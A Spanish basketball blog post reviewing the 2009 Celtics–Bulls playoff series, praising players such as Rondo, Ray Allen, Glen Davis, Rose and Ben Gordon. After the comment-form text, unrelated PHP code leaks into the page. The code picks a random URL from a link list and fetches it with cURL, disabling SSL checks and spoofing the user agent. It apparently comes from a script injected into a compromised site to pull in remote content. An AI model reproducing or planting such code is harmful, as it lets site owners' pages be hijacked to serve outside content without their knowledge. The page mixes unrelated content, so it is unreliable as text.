Celtics 4 – Bulls 3: La Serie (con mayúsculas)

04 de May de 2009 por txusma

Ya avisábamos en nuestro pronóstico que sin Garnett, la serie se igualaba y que las opciones de los Bulls subían enteros. De cualquier modo ni en nuestros más húmedos sueños podíamos imaginarnos una serie como la que hemos podido contemplar. Nada más y nada menos que 7 prórrogas en una serie donde, a pesar de lo que diga el cuadro de los Playoffs, no ha habido vencedores ni vencidos tan sólo baloncesto en estado puro.

De cualquier manera, aún habiéndonos acercado a lo que ha acabado sucediendo la realidad ha ido por caminos ligeramente diferentes. La ausencia de Kevin Garnett ha provocado que algunos jugadores de los Celtics tuvieran que dar un paso al frente y entre ellos no podemos dejar de destacar los nombres de Rajon Rondo, Ray Allen y Glen Davis. El base ha cuajado una serie simplemente sensacional, sobretodo los 5 primeros partidos y sobretodo a nivel estadístico. Ha defendido a Rose todo lo que éste se ha dejado y ha comandado a su equipo en momentos en los que se encontraba perdido. Ray Allen pareció bajar a los infiernos en el primer partido, el que perdió Boston en su casa y encendió todas las alarmas, pero su rendimiento posterior ha sido simplemente maravilloso. Su duelo anotador con Ben Gordon en el sexto partido debería pasar a la historia y su aportación en los 2 últimos partidos bien se podría calificar de clave. ¿Y qué decir de Glen Davis? Habitual en nuestra sección de la “Sorpresa de la jornada” ha resultado ser todo un descubrimiento para el gran público pareciendo en ocasiones que Garnett estaba sobre la pista pero con 20 kilos de más. Junto a kendrick Perkins ha conseguido que el duelo en el juego interior no cayera claramente del lado de Chicago. Y entre todos ellos un Paul Pierce que sin alcanzar la excelencia, ha demostrado un gran nivel al que ya nos tiene acostumbrados. Disponer en el equipo a 2 jugadores como Allen y Pierce con la sangre fría y el acierto demostrado para jugarse los últimos tiros es un auténtico lujazo.

Por su parte los Bulls seguro que encajaron la derrota con una sonrisa. Hace unos meses nadie daba un duro porque pudieran clasificarse para los Playoffs y ahora, en cambio, han sido protagonista de una de las mejores series de la historia. Si los fichajes de Miller y Salmons hubieran llegado antes tal vez esta serie no se hubiera producido nunca y ahora podríamos estar a punto de disfrutar un Cavs-Bulls. Quien sabe.

La cuestión es que finalmente Vinny del Negro se hizo con la plantilla y que ésta ha demostrado un nivel excelso en todos sus frentes a pesar de contar con la baja significativa de Luol Deng (poquita gente se acuerda de él ahora, aunque si del contrato que firmó). Derrick Rose entregó su carta de presentación el primer día (¿lo recordáis, no?) y ha mantenido, con algun altibajo, un buen tono durante toda la serie. No hemos de olvidar que hablamos de un rookie, capaz de jugar como un auténtico veterano un día y perderse en decisiones extrañas al siguiente. En todo caso un fantástico jugador con mucho, muchísimo futuro por delante. Su mejor acompañante ha sido Ben Gordon, que se ha movido como pez en el agua en este ambiente de prórroga tras prórroga. Su mejor faceta, la de killer consumado con el arma siempre a punto, ha salido a relucir en innumerables ocasiones y en la mayoría con gran éxito. Le podremos culpar en ocasiones de ser un chupón o no involucrarse en otros aspectos del juego pero él sabe que es lo que mejor sabe hacer. Y a nosotros, tras esta serie, ya no nos queda ninguna duda.

Tras los 2 protagonistas de los Bulls toda una serie de “secundarios” encabezados por John Salmons, clave en un par de partidos, y con Noah, Brad Miller, Thomas e Hinrich. Todos han tenido que dar lo máximo tanto a nivel físico como mental para poder superar dificultad tras dificultad y llegar al séptimo partido con todas las opciones por delante.

Tras esta obra de arte, toca esperar al futuro que les depara a las 2 franquicias. Por un lado los verdes pueden haber salido exhaustos o hipermotivados de esta eliminatoria, rápido lo sabremos, y por el otro los Bulls se enfrentan a un verano interesante que les puede situar de nuevo en la élite del Este, con la renovación de Gordon como principal decisión.

De momento y mientra el futuro llega podremos disfrutar una y otra vez de la mejor eliminatoria del siglo XXI. ¿O se os ocurre otra mejor?

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>